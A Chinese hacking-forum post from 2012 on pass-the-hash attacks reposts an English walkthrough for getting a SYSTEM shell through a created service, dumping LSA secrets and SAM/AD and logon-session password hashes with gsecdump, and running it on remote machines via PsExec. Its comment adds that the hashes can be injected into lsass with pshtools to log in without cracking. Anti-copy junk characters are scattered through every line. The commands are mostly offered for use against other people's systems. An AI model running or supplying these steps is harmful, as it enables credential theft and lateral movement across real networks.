找回密码
 立即注册
查看: 2552|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
* ^: U% S/ G9 V$ ~; _) n% v! [" Y  }+ L2 e) |2 h2 I( q( Z
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact6 J& Q6 H7 e! k: O$ d
[SC] CreateService SUCCESS
' w6 J; B, R4 w4 Z
7 M* n% r4 t8 J; r3 B+ \C:\>sc start shellcmdline
+ }" ]: w. S, m6 ?1 }[SC] StartService FAILED 1053:  E- q# [. l8 d7 j, z+ ^
' x: U+ Y0 N  r9 X- `$ E
The service did not respond to the start or control request in a timely fashion.+ B% L) F" U& i" F  S+ z

+ G5 a; ]  H( x& g* r7 p, z9 SC:\>sc delete shellcmdline+ u7 v& i+ z4 A
[SC] DeleteService SUCCESS
2 c1 U- f( W, y8 H! L
0 }9 K7 y2 K: r  D* c+ E+ H------------4 C5 n* B$ Z7 ?8 h/ t4 O
& C3 `, f( X8 R& N0 v& M
Then in the new DOS window:$ R8 ^6 [  D2 J; |/ p6 D
: w/ w5 D  r2 z' C; ^
Microsoft Windows XP [Version 5.1.2600]
# Z5 @9 z- n0 r$ I7 w(C) Copyright 1985-2001 Microsoft Corp.( L0 }+ r3 O  `. n, f

# ]2 `5 _' N) M$ t. J# A: R7 ]- QC:\WINDOWS\system32>whoami( [3 L+ d5 k5 c0 s% @* V
NT AUTHORITY\SYSTEM
7 a/ I" h, b  `. i- Q. n1 H8 E; }
0 f+ |9 [3 H: @, H6 }& C. v  LC:\WINDOWS\system32>gsecdump -h
7 ^6 f/ G4 l' xgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
/ J8 h' U6 |& G. _& ]2 m; v  Busage: gsecdump [options]3 }" X/ C' Z  r, j+ j; U% x7 i

1 C% j8 `" k' N& Uoptions:
: l5 ^2 a5 n* u: N( q5 O-h [ --help ] show help
% T! _5 O6 h' G' U( `-a [ --dump_all ] dump all secrets. \6 H' t/ Z, j2 c3 Q% |; g8 s& y0 z) V
-l [ --dump_lsa ] dump lsa secrets) k2 w. \3 l' T! T4 Z$ V
-w [ --dump_wireless ] dump microsoft wireless connections4 j) ~; J. Y7 H6 m& |! l
-u [ --dump_usedhashes ] dump hashes from active logon sessions
% w; h# d/ T! _- K2 D) B-s [ --dump_hashes ] dump hashes from SAM/AD9 |- U6 p$ h- i: j

% [  S1 R) ~: r  PAlthough I like to use:
& g: F" S& ]* v- C% A8 H5 G8 @9 L& i& Q+ n3 b
PsExec v1.83 - Execute processes remotely
+ `; ?% A& o+ o/ J" D3 nCopyright (C) 2001-2007 Mark Russinovich
6 E4 }! O0 A9 }Sysinternals - 链接标记[url]www.sysinternals.com[/url]+ O# Z4 [/ R" o' P2 }* b: ~  t
, ~+ M1 i1 M3 D/ M# Q, p
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
; Q/ G1 x8 u: S6 ^3 j1 l4 E% O0 B8 [( B' g5 U
to get the hashes from active logon sessions of a remote system.7 V/ N0 o$ M; M* s  i; L9 \5 l7 z
, X* n, u( B' h' F. ?
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.! ]% E9 W$ i( w

4 e) @. O) L2 L( W1 c提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.- `# m, m) G* h. c- p6 b$ F. m' k, y
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
1 ^5 L/ X- Q- u8 ]% l6 t0 g- k. g3 g+ L( O" X6 {8 F
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。# F' R/ y5 g- a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表